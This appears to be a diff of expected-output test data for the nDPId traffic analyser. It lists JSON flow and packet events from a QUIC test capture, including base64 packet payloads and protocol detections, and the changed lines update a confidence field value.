02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1621500710508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500710508,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIBAAH4RAys0uxSvZsLPs9AMAbsFThGvwP8AAB0ItCn86+Se4YgAAEU01ef7l0UP4woUE5dsuDr8jBLUL6glp4Hay+1PVqJ1qjZhTrhZ\/HlCWneFdokdJJCHL9aLl4EI+zRfD\/McWX32i\/GREyeHr4lMy4TiI6zbvduEowF9eNA5Tp3OZ9GCbt+VMsYazwXNCMv7NFAV34d4tKKg3LHgAaEVn2Y+UbC2G+bYh+I3BU7O10HCLFpy7dljaBLe9qgbXIUuhMGDWNAnyQ+uYXiH2Jephgdag65enzMRnzpWg6tOxGmRHM\/sp7fpGYwk8PUnJ\/bg3wGtSnXhZccRwt0adDkhfdJ32tQWidjaGerN9H2lZ7O397QtbCs9\/8om91WjQ21YVaDo4Ipv8H0+f1V\/Cc42HBGsarDGnoyUmUg1jicgM5DPMJpvLG2UQQK5tiuC\/cbEV8WUL7QwOcxB3jbJTnxR1MHJT3pp81ODQhzEb3PhIJ\/5Cs0fOuGXlljtXRHGXKKK9NsXQ0izy4kIRIbdXUZKKUe4T4svk7KGeA3O23ttudesKDm99vJFGPLYZ34J
Aet2qmXSBcBuHQHN4aXeGdVG7MFzyQ92k+oQwlhlcIAhjHVS07UHZXN\/vQViV2LX6DSII6bHO8BhhtxKEj+5T+AEO+gFSPXVLnsAtt9jbTLOZtW1OuAXvN2H99cPQ6kiz\/OG9Z9DeWz\/n4jYXXfnHNa1A5r8RPBukPjk+DreRRGc9TBqR\/n8DDhNakfL0Fck3RKiTr8g2Av+YbMsrLWtvcnoT0rNWL7JWLcj4+4\/jtD3F4oDSeZdh9waOz7hGXnbyoVXNWXrcFpfx77eeqj51aL+3KRVwUbkgRwo5pHgL7hEnxN9VPb3Nbay587MleldGfNDOngB7dKByzM6zduwHhffnRWrDEBE3EQQI5wNwKLOIv9dQzppwC58eZxY0Cxh0nyCfck9L+upLS\/SSPRp0lZCWPVizK57z1DXIwneHbP\/8Hgysu7PPLkyCRSECVbbbitAvbtwLTHK33sAbO3oKAAAXnwbYjqk9lZmdLeO84o92phBblzzTWEVyzJf6XwtEie79iUzv0gOZKqtupDWJnjOgWOhhSra3KOxaFoHE05l7vFbVZMWFjqvSUOIj7aT8pRtZ3A8XiI4yAenMZbx8Noig2Tv\/4iZBtEhsXIEPJ\/GdI+cZsswHBmC4MoRRX8sfAcQcLKC0NsE8iTGSOI5BQZLzHhGSKkGn8XVlyAlmI52p44RHuokDQeePWi0IqXdipLo52vUi32A9W5ZySu8wjwH0+TmQOsjtyEt1WRsQ9wLF3apv\/TUW4+usvpV159wu9QNjO39MwP7rVLYpRTpK2fHgNOq47+RoVsFZDNOEQMG6JcZfYhdRpJCFZTxbCJLGBrNE8SO9hLhrTXR0B0IZGDIZ35DJlgU3Za+yK3uSCBc3IN0p97ksRGA5FKvCPtJcsM2\/csH6\/HU1qf1f0iRNI\/TtUb6I73fJb1bLdQeKNHntzmogBwn9oPuqo+gtLSwtXae5sl70N5g4LrZ8PFnTx2lQMUWHnNA7\/NfKlV24zKPWKBQFEp1Ll+GkIQ4+2VSqwKteIza9AEA0HQRFuVoFbCOySV1C2F5DI6b3bUAcZPOS4EK5sgcvgQXK\/kw5Lml\/5HXzi6wNd7ujorlYuy1rrbgADxiFT3G3+7eEQmrzleWwgR84fGJrsGXGWRRksb0D4sgTRBJoHHnzf+UHtoZlhKZ7MrrWCe+rgmAPKYrQl5HS2h0M4Sd0TsvG35w8Nfd7uE0Cm1gQkCkKH2QZcTaB17nO+93nufc4orBsf0H"} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1621500711118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500711118,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIFAAH4RAyo0uxSvZsLPs9AMAbsFTmIiwf8AAB0ItCn86+Se4YgAAEU0FvsScjgiXb43Z5OHmvEYwaOoC42xDpqJfRfqlKRpZwF5AnAxrqFV79ZpFnEvEhLmveXc5xDzsSroW6m86jG45I0fFyX3DYlFTlRWn6Sytea5JPO12EfJbfqSFvNzEqmQ4gFas2HXJ2FX2ZoFtOrT1Qp43etaUsidgduMrH94THaDB9pQcwHKupL0h5YJ21d4uDpduyjYmRI\/jSmxZ2o5487BjNxGIiLtUrbwVkNIPSfjyMP5aDNyEKH0uc0UKMUvLMNr7XpQ1A1u47hFs287N4mHIG56vvgNzeLUDt0k1MPT\/kGpWCx8pGpFNrvk1nrkx7VkZAvjp\/9BdDBzSjx\/eUYtrNhzQ0IQe0hI2dyVNc8oZJZ9LtwNkx13TL3XaejmmuaYZ5B1EgN210MMBgN2q4MKppTuAvCQdN0rYg1Eetfey1Czpq8DvYrtRob0CYoPxRNQb4hQY+mAtVm5In1K8uiwgIb9fwBZ4878UCDelVNFoIUw+l3DO2r3eQiyJ1qJ2FQD5njNdWfokooKrW7pkJaWp1Su7UEKIwCrHqPQdqZjdBG1V1fXoUW3f50uoUtNBqxzmzG\/nc6r9vmn7Hupo64j5xAOGxtoJ7+CXMmYHHWY26B1SVO8GEqfiJKdUBeSOJP+\/MJ8MxDfNBGk\/ZN++nWubo5tvAD59mguiYbs2TJn97d75ZXwCSvntISAbbWVTp8AcyBv7hFM4CenTfEcDoR0h+9UMmt410Igj8DfCq0uBJ9bfdd9vaavpedqeSBrcaCWj6Vm8lPgRR9m+idu+v42W\/Y7dhhPvUrZYy43dKrTyr1UA6FrlC0+cMVKwBuas+sYqkr29klDCbiXmBJwbwFjeK4tVoMcVU5tgERpJO29uTaQwM9TtLKYYpaiU3bEFvVtP\/Qtn3qhFg87\/I\/RWjoT+rBbR4QDQUW9VPOaC\/zE01OtUPc5D50Oe30bx8WsZ3NjQ\/Rz1culaGAqFUjPGD3UTvfe+YzvsST9oPhqowv7hv2g7D78AygZJDWj3Xy+kWEnj\/pB3Jx0\/OvXiqzf2tizghsbgz\/7TQfvenyU\/YjzQzisVkudIMBHZfHpFf1xszofNNVEViopslpwwFJvvLgUhw0aVf5anl4AFVfHf7Fbiq+ByHxdPrQzfWnqt4ebVjeIYwLQRD+Sc5q5KKw9n351IQvh3iLjQfOMlC29Lv8K\/f64xF454eAM+T3ej9aTbN2lpyk4d44ROP1Oa47QDp0riFycvY47pAgeZtogdK11E5+iMGpqTnOxn9+LXFyNRlhHrvu67ztK3yT1Q38o1K6t76Qdc2LLNxNb42ZTHdtkEvDq4+GjOdvvGXlynEQvbTtvdG6fACdyaH0xeuILHqQCt+BvoL\/9SLWq+5Q6qid0Ax80+f42fP1VeV80Df+srNlHtlx1gxx0eFSN\/ZxupB3yFoybkQHafOdB3DjIHqI2gODRQBgLO27D\/lTmmK
6tKkQ951QvnyKrHxord7vZSW3Oq7RRLWR+SVjkGHmv3l\/Ze5hnE5cZJuxcuPAk2mAKwF+6k5B3F+cbJWDnxNeoh4C1jTw62drlxgT1oJkzh1x0IBq5I1mmRgifHxa24oQE8RAkrXlt\/l6PygI3tBmwEN7W9ztIBr0mGHgoMXHSI2+\/eoOzMY2+qscRsVIWNEx6WLxrztwLs9nHe+LJi\/8hqm0+hjADeZHms9rDOsWgE7WwhNZcW0TgSYYOby+hR7hjZUUjIMuY3PvHUBu9nOxFOj6gdeVPSzcIl5MJbJVDUDw2yOc8"} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621499130835,"flow_last_seen":1621499132950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621499130835,"flow_last_seen":1621499132950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1621500832402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500832402,"pkt":"AAAAAAAAAAEAS1QMCABFAAVihQ5AAH4R1KOokEAFTOdoXMNnAbsFTmnVw\/8AAB0I\/OwNUvQ+5iAANwD\/vPgHoWBY9NVx91aESVG1GnIYeTvUSJob\/THkhDsxHgK0tQMlP\/y+OlG6T8LyKR+iBLXMyoZE\/aVKFhxdLISFi4uHtAlWOTu3Tp\/rNeF0Ycpw9lNtrGZKHgK52aGmw1F+Vm7gts63ZzZWpjO2b2dfnUcihRfdcWSl8WQQqp9Bex37Efxn8GSZ9yV9+YweKHZuoktgPz6lo1Hx0py7NH2sEOpCsHuOmQV3pkdWkgyH5Yy8e+mDo3M8Lf4uvHc+eXJBa3EaCkPMxen5GcdhzCr3mrXeME5XHL2nTes6kErkbatKTZJBia8PejzLFSjdIh878tNRvmWaKnFQUTDgcDftx6OhWfT9aTAtihrhh80i+NJdXObI+LP5jfp6VUNFk\/iSFBb\/TLXGEWIDnGVL6jXCYr\/jF550paaG2\/05LqVb0lAO2DQezwhWmWBhSJGamJQyHgYTP2G2z579ukMU+m1MIBlp6G0fCF77SkWYSpcZa37JwyO+oGTmTTrQw4DDsfnNJ6qtURb6c1EZgljs+2MQvOyBlUgLiqJfL9Sy7+bVNh6BSZmu2SnB0XsrJz8ExvgL2JeLgA1jPTRz3PGX2IfOOJmvZ\/Iw5bWBcHVXAq+IcoiBl9hHt2AkJHGz\/byaPbJJ66HJfgB14EIB\/lUwQo1A1SSUXMKv\/TK9koxXTwle8Lkn54qEQdqJWRvVbwg0JseXWs8OMsGkFLele\/q07epiVACDd\/g1Jm+ZePpL983W2YeTK+eU7VLHC3JA09oJxkbg1B+bTVBsiq0+mlaeyZ4QsRiZnP+9H4807KaDybRKTE8tQUtEr37hHuYCyw5PxJ8FFjK
Wt2QiUzVAiu0MjkYwdO09pwoMaH1i59EPGPGNhR57sTKB2wVEV6JE6NQ8yLMvSBUd9dyDB21nWx2ARNrcsc1WlrbGEhGKx8y96up+FRZHCjeNJbO6GPNGdyZS+RcIKDc\/sxkx7RupbqAi+d8Bt+oXDSg0tZAmjCf8VvVg\/k80bbgPZjm5To457D0tTkTf8V6Zx8om4HCzWH0sHPFBmf27ADSR6DlozQlivcbzfZaKUML+CfQN\/AOYuLtlr\/H4lqxR8dtAwKahvwW7\/NRmgYEFXDJN3bJS9GjmGOOgKZxwI0uH7FodIm88enl9xRV0Jvgh8Kgk1aL11oukFFBgq9kowqa4t5sHXxG027eiPUY3I+LvD3YOs01STBZNgyX4zoY1udrG790mdQfHt0JsUey8gKDDV6Mrii7E31WSascM\/TXrq7IBo+QDu6smYU6IFRAByq+cHfvGh9cGLPvAzc\/PaSrCQ8lQZlhadWowHm9HfqjTWwtDDxzY1ZzEFn\/ykUcQ5T517Ga\/PzlrVjwpdzkZabhpXnKYalHNVtkvXskX+fuRlw1O9pywR139ESVKUEegskOPrIBR11Ur8xk0\/nC3Mw1zJ98R1AFW1bQwe+QwJvSpwFpYhm\/2wNkJHrE5fUKBl09Wmtfin\/0fDKjZAnq1XzsVpqje2zDaCTh7VEpkWk5S3q86sRcojMPfzDFUdFBNEIT3dLWmuLxfFG2Ho6lWkZAgHIKSSvHA84mOYVnYLexouIlL+EhwoOmEipiiUiVJXGZkSCwjtyupj0BjO2QULdNBtK\/XGoJduknKIbcYWebyEnEpxO1Cicl7fEXS9+YbM\/rMPWEr+mcAUdeFx32z2bF0zY4DxjEv26u3i5TRnvLzaQCmin\/duWBzxsVC3pO\/wjp9iIlGSS+Qcatkp0jS9\/HNB9\/ya8my0blefl49VH7\/"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1621501125036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501125036,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGchAAH4RgMKokEAFQSEzSv9QAbsFTrOQxv8AAB0IBDctHg05eGMANwA63caAA9thM8CnmtvPCsUhrbHTSUm+PmUcMNSKbWxGe5n0KlMPA\/Ab1TeVXrcKT\/s6bNMGiVVE\/Y\/69wmX+dmpzOGyJXfQtZPXNvgdAety5H0aaOEE7kffH7GYopi+TnU7X81j2zr5T1AcyXW4xwfPQqNjCkl7q4Y3aeDwCNcBIXJjS0cRABpWd4CFVxJeR67TsCsSv5FbpkqXMrDYhjzjrve\/sy87Yz7Z9ci1SSWv37yRACmKZulUZgb2lUkKSfenjONGW3S2wzKcrlj+TJQRg8\/bM9SNvt\/mCcgtVbTKLWbc+6PK5acKkQo3AdoGk5LEPb3l\/lQbLDG7JPRHJbZN8WUgPhRMqvGmH9CVBsbUQhTCVDm79glJnIm864PHxQ+t0sJHyebmg6XpGa2XYkUH2udqnf5+TTklcbBY\/R+qQP9YENJHrWSqS3ukUykQ0LjwlbuFhVHFAQ\/dxjDnWRSWKbRXG1NBvSlBffj33m41y\/BGqblG4oqUMrPzg1AdNzGWkFx3dfG4qE6jX4vypIKbmC7ww11\/bnqazyGvXVb\/qGv65\/bNEhR2F5JiCl4VlKXNgd2pkEqH425n6llnIOarnIlAFSHuFowuohSpsD5QcFX5UcWdhvyCoeuvwf5QxCPPKwuVKkeBE9JZdqIAdgwk6k2JahHoe9xE0fV1WdUs9GEH0pmQ8XxwJfQNNe9pfm7SAvyvW6AGvman3pEUJ3JJN3sVwyOiSI46dmLN\/gLYOaXzUMscfs3uNK42vabWH2f0fHSfBVduUsdDgwj2A9X9vZeZHeEU0AOwu1JroY\/X9M5vYPFxgUn4ui0etmumSVF1NfkFMIHTL2APYRacjCGMcVMTtDDglynqnLKHYUUQtNWqewrNtG9PHzcXuPhHzdOY0tg9FgaoraKpz6q5UqcKBzr2JjkXTep9JNqk5XEbwydGTgI5uoUzDCEAd9SVY58G6YNgOXJM72nV8QMCKvZ3XaSIH5w8qvkn4y+DE1msPs+0jjDIyDXNocrSDJ1AHCTzzWkP+w6H60iAOu9cn+Mnv8SiYPPciI\/PJWXhwM3wLkeNtUoiSczzgq7\/Z0NlAzOcUuSPUr404jqpSbsJLrUCNh2Hh0dkAD64yuGEGkYaLp8R5cHVIH1ItyvLeUglmfKQ9Uy1in+NSc9s9rgslR0ZYvwGV43IdrN1a8sbpRZRn\/6y6xJSP6VRA3qbgEM1014Xzxzg1C1k2pXKaZ3dRIS7DAmfP9AU\/jP7\/XH1KfbRfliwERe1f0hLOCnRYQayZGEdVA7U4EwP4GWIPM1mQJfc4x1wWHWPhcFpf7\/3kzOtmlx8FRonLLppe8qkuqfrTbLOUjx4ZI4BETBbxLbvlIKHEhoiCBd+yDUZCFKScdNpwrxVWVSz0cwfPkFvXivV0Btog7bQP8r0ps03inXLu3iY42JhuwOQtgnq9gOUYo5mWHDsf\/dFNji6zcIuare
N16h5QMAId9cs9d8XeEtgmsP3EkHv62qC0lObg7DYq50UhiG+dr7cGC8xrqlQYyQ2eUFldqUAvW5Yq3oPDufxJfRMe4FoawMPGgol1Fx4lcF3O9ljlCrqKWUD5XziIcnMUjDT5ommu1A4ChUADEhFdaXkO3z0ajdsvt+2FU+8jk8sCeHs0aoS8LD9tqGOK\/tBhpgsLDtXqVg4vWFfDpOmZ6anyereIg5y9YTigYUAnRYoUArd1znOjveswaiQB3BfOR1AQE\/Wu+8zomZDAHW7r3Or47VOVnEd3KueolaHuDAxCBxZQsZy"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1621501260783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501260783,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVLhAAH4RRAufdbB8z3k\/XPqGAbsFTtJqyv8AAB0IqwzBH+7SJ6oAAEU0OmGuRD6o6zt6nf9tmhZ4egDU3ziCGGMLigzQd\/qcgJuXuFXJaHBdLU0MBpsdPKMeIvS9Od3J6aS7A4aqWHEzIUcAYpLZNGiwuH3wRo\/ZCRSY8hB6LE3YzLe42CdSzc5lCzItOsVUkYEC0ElANHXZEVA1CYAydF9uHTTyCq2uXRt3pMNkc6SD2TRzdAjxNMy4aC+pKc8u60PxO0LJCtV5c4GHi\/apOFYyznJrd5zwDibl6ADYf0eOlYG7Dmb+62KXGzs+UZINoqFEItj8sokCUApXkVgH3JMM1tQ7\/i+CPMar5u5VhzM0xoMe4DQC0z+Yuf3p0TEn1Yqj0xXSzHscv\/FAGmONfCIQGf4DqCpAxJhcdINRN9hpMwFEfhYgZXMbdUkpqQbEUlH6Jh8L0xXSG8BNDbJ+HqsCUU8yfHEs9031W1jXujoXs